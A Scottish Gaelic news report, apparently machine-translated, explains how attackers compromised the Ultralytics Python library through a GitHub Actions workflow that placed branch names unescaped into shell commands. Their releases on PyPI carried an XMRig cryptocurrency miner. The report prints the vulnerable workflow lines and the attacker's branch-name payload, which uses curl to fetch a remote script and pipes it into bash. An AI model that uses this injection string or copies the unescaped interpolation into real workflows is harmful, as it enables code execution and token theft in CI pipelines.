Mar thoradh air bug ann an inneal-làimhseachaidh GitHub Actions chaidh fiosan droch-rùnach Ultralytics fhoillseachadh

Bha e comasach don luchd-ionnsaigh còd a chuir an gnìomh le còraichean làimhseachaidh GitHub Actions ann an stòr leabharlann Ultralytics Python, a thathas a’ cleachdadh gus fuasgladh fhaighinn air duilgheadasan lèirsinn coimpiutair leithid lorg nithean ann an ìomhaighean agus sgaradh ìomhaighean. Às deidh dhaibh faighinn chun stòr, dh’ fhoillsich an luchd-ionnsaigh grunn bhrathan ùra Ultralytics anns an eòlaire PyPI, a bha a’ toirt a-steach atharrachaidhean droch-rùnach airson mèinnearachd cryptocurrency. Thairis air a’ mhìos a dh’ fhalbh, chaidh leabharlann Ultralytics a luchdachadh sìos bho chatalog PyPI còrr air 6.4 millean uair.

Gus an stòr a mhilleadh, chaidh so-leòntachd a chleachdadh anns a’ phacaid ultralytics-actions, a thathas a’ cleachdadh gus luchd-làimhseachaidh a chuir air bhog gu fèin-ghluasadach nuair a thèid gnìomhan sònraichte a dhèanamh air stòr air GitHub a’ cleachdadh an uidheamachd GitHub Actions. Anns a 'phròiseact ultralytics, bha an neach-làimhseachaidh so-leònte ceangailte ris an tachartas pull_request_target agus chaidh a ghairm nuair a thàinig iarrtasan tarraing ùr. Gu sònraichte, gus an còd a chruth anns na h-iarrtasan tarraing a chaidh a chuir, chaidh an inneal-làimhseachaidh format.yml a ghairm agus chaidh an còd a chaidh a shònrachadh anns an roinn “run” den fhaidhle action.yml a chuir gu bàs, anns an robh òrdughan shligean le pàtrain ionaid: git pull origin ${{ github.head_ref || github.ref }} git config --global user.name "${{ inputs.github_username }}" git config --global user.email "${{ inputs.github_email }}"

Mar sin, chaidh ainm a’ mheur Git air an deach iomradh a thoirt san iarrtas tarraing a chuir an àite òrdughan shligean gun teicheadh ​​​​gu ceart. Bu chòir a thoirt fa-near gun do shuidhich am pasgan ultralytics-actions san Lùnastal so-leòntachd coltach ri bhith a’ cleachdadh luach bhon taobh a-muigh ann an gnìomh mac-talla: mac-talla “github.event.pull_request.head.ref: ${{ github.event.pull_request .head.ref }} »

Gus cur an gnìomh a ’chòd aca a chuir air dòigh ann an co-theacsa neach-làimhseachaidh GitHub Actions, chuir an luchd-ionnsaigh iarrtas tarraing chun stòr ultralytics, a’ sònrachadh na leanas mar ainm a ’mheur: openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Mar sin, nuair a fhuaireadh iarrtas tarraing, chaidh an t-sreang a chaidh a shònrachadh don neach-ionnsaigh “$(…)” a chuir a-steach don chòd, agus, nuair a chaidh an inneal-làimhseachaidh a chuir air bhog às deidh sin, chaidh an còd “curl -sSfL raw.githubusercontent a chuir gu bàs. com/…/file.sh | bash".

Faodar còd ruith ann an co-theacsa GitHub Actions a chleachdadh gus tòcan ruigsinneachd tasgaidh agus dàta mothachail eile a ghlacadh. Chan eil e soilleir fhathast ciamar a chaidh aig an luchd-ionnsaigh air foillseachadh a ghineadh, leis an comas an còd aca a chuir an gnìomh ann an Gnìomhan GitHub; thathas a’ gabhail ris gun do dh’ fhàs seo comasach mar thoradh air atharrachadh ann an inneal-làimhseachaidh publish.yml (thug an luchd-ionnsaigh air falbh dearbhadh an cunntas a tha ceadaichte fiosan fhoillseachadh ann am PyPI) agus cleachdadh teicneòlas a’ puinnseanachadh tasgadan togail GitHub Actions gus an dàta agad a chuir a-steach don fhoillseachadh.

Chaidh a’ chiad fhoillseachadh droch-rùnach de Ultralytics 8.3.41 fhoillseachadh leis na luchd-ionnsaigh air PyPI air 4 Dùbhlachd aig 23:51 PM (MSK) agus chaidh a thoirt air falbh aig 12:15 PM an ath latha. Aig 15:47 PM, chaidh fhoillseachadh agus a thoirt air falbh aig 16:47 PM, brath eile, 8.3.42. Mar sin, bha na dreachan droch-rùnach rim faighinn airson an luchdachadh sìos airson timcheall air 13 uairean a thìde gu h-iomlan (tha PyPI a’ clàradh timcheall air 250 luchdachadh sìos de leabharlann ultralytics gach latha). Bha còd anns na brathan 8.3.41 agus 8.3.42 a chaidh a luchdachadh sìos bho shiostam taobh a-muigh. frithealaiche Pàirt XMRig airson mèinnearachd airgead didseatach.

Shuidhich luchd-leasachaidh a’ phròiseict an duilgheadas agus chruthaich iad fiosan ceartachaidh 8.3.43 agus 8.3.44, ach dà latha às deidh sin chaidh ionnsaigh eile a dhèanamh, nuair a dh’ fhoillsich an luchd-ionnsaigh dà fhoillseachadh droch-rùnach a bharrachd an-diugh aig 04:41 agus 05:27 (MSK) - 8.3.45. Gu ruige deireadh an sgrùdaidh, thathas a’ moladh do luchd-cleachdaidh stad a chuir air dreachan ùra a chuir a-steach agus fuasgladh 8.3.46 a chàradh mar eisimeileachd.

Source: fosgailtenet.ru